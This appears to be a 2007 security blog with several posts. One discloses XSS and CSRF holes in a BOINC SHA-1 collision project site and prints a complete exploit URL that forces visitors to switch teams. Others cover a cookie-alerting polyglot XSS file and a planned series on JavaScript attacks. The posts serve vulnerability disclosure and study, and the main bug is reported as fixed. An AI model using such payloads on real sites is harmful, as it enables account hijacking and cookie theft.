Thursday, August 23, 2007

SHA-1 Collision Search Graz XSS and CSRF

A couple of days ago, at elhacker.net, they showed a project, for finding SHA-1 collisions.
After I registered, I found out that there was a "competition" of teams, for winning credits.
http://boinc.iaik.tugraz.at/sha1_coll_search/top_teams.php

So, after checking out how it worked, I found a CSRF, and XSS at the team search engine.

So, I made a simple exploit, that will change your team to.. BOINC Confederation.

The XSS vuln, is here:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=XSS&search=Search

The CSRF vuln is in all forms..

The exploit (for firefox) is:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=%3Cscript%3Ewith(new%20XMLHttpRequest()){open(%22GET%22,%22http://boinc.iaik.tugraz.at/team_quit_form.php%22,false);send(null);x=responseText.match(/id%20value=([0-9]*)/)[1];open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_quit_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22id=%22%2Bx);open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_join_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22teamid=1%22);}%3C/script%3E&search=Search

Pretty simple :P

So, by "stealing" a user of an important team.. you can make your team win, the list of the top users is here:
http://boinc.iaik.tugraz.at/top_users.php

Greetz!!

--EDIT--
The bug has been fixed :) is good to see that someone actually reads my blog xD

Monday, August 06, 2007

JavaScript is just evil (for you) [ Part I ]

This is the first of 3 parts of the document entitled: "JavaScript is just evil".

Here are the first 2 chapters.

1.- DoSing the browser


You wont learn anything new in this first chapter, is just a set of examples.

2.- Injecting code and tracing stack


Here we will see some attack vectors for chrome privilege escalation.



In them will demonstrate by several code examples, how JavaScript can be used for evil uses.

This started a while ago, when, while chatting with Giorgio Maone, and showing him an example that crashed Firefox (using intervals), he said as response.. "there's nothing we can do, javascript is just evil"..

The phrase "javascript is just evil" captivated me in such a way, that I started thinking in which ways javascript could be used for evil.

Now, I divided the document in 3 sections, and them divided into 5 chapters.

    JavaScript is just evil (for you).


  1. DoSing the browser

  2. Injecting code and tracing stack

  3. JavaScript is just evil (for your server).


  4. XSS Worms

  5. DOM Level XSS

  6. JavaScript is just evil (for your local files).


  7. Local Files Privileges and HTA's



I hope you like them!

Morfi! the Human readable+HTML+JavaScript file all in one..

Here I present a file that will appear different depending on which application you open it.
As plain text, it will describe how it works, as HTML, it will define XSS, and as JavaScript
it will pop up a simple alert(document.cookie+window.location); XSS PoC.

Opened as plain text (just reading the words in the code):

This HTML file is a PoC on how complex the HTML and JavaScript code can get and
here, with the use of style and changing the visibility to hidden on some non
style elements, we will hide and show some parts of js code and HTML, we will also make
Function and a javascript alert that shows a document cookie and the window location, a
script that takes as src the same file, and executes the code inside the script
and a HTML file that is also XML valid, and will define XSS.

Opened as JavaScript:

alert(document.cookie+window.location);

Opened as HTML in Firefox:

this, "the attack based on accessing and modifying a webpage in the context of other domain" is the function of XSS attacks.

It will also show an alert, produced by including itself as a javascript script.

http://www.sirdarckcat.net/morfi.html

This was submitted for The Month of Hacker Folklore at GNUCITIZEN.

Saturday, August 04, 2007

Google teachs security basics

It's rather simple.. and it deals with vulns at the "server level" (no sqli, rfi, xss, etc..) anyway..

http://code.google.com/edu/content/submissions/web_security/listing.html

Lectures

Coding Projects



It has 2 slide shows and 1 problem set.

Thanks to crack_x for showing me the code.google.com/edu site.

Discuss here: http://sla.ckers.org/forum/read.php?13,14409